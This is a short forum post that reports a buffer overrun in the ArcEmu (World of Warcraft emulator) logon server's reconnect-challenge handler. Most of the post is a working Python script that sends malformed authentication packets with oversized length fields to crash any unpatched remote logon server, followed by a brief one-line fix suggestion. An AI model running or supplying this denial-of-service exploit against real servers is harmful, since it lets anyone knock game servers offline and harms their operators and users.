Crashing ArcEmu for fun and profit.

[christinaa]

I was feeling bored so I've decided to try crashing ArcEmu. After 10 minutes I found a trivial buffer overrun vulnerability in the logon server.

So I wrote this simple python script that can crash the logon server. So yeah, there we go. Tested on 'ArcEmu 4.0-TRUNK 40e202f/Release-Linux (X86)', sometimes this just causes a segfault and sometimes it causes a double free in which case glibc causes a trap (either way, it's a crash).

To clarify, this can crash any remote ArcEmu logonserver that doesn't have this fixed.

Code:

# whoop whoop
# bug in AuthSocket::HandleReconnectChallenge

import socket
import struct

def pk(x, *xx):
	return struct.pack(x, *xx);

def to_fourcc(i):
	return pk('4s', i)

print("connecting ...");

def emit_bad_challenge(ln):
	# construct auth challenge 
	ac = '';

	# 2 = AuthSocket::HandleReconnectChallenge

	## header ##
	ac += pk('BBH', 2, 0, 80); # cmd, error, size

	## body ##
	ac += to_fourcc('WoW '); # magic
	ac += pk('BBB', 0x00, 0x80, 0x00); # version1,2,3
	ac += pk('H', 12340); # build 
	ac += to_fourcc('x86 '); # platform
	ac += to_fourcc('Win '); # os
	ac += to_fourcc('enUS'); # country
	ac += pk('i', -419); # timezone bias
	ac += pk('i', 0); # ip
	ac += pk('B', ln); # len
	ac += pk('50s', ' ');

	return ac

def send_junk(sock, k):
	ac = emit_bad_challenge(k);
	x = sock.send(ac);
	print("\tsend_junk: %d (length = %d, sent = %d)" % (k, len(ac), x));


for i in range(50, 255):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
	s.connect(("10.211.55.3", 3724));
	print("> %s" % s);
	send_junk(s, i);

To fix, add a length check in AuthSocket.cpp before the 'm_challenge.I[m_challenge.I_len] = 0;' thing.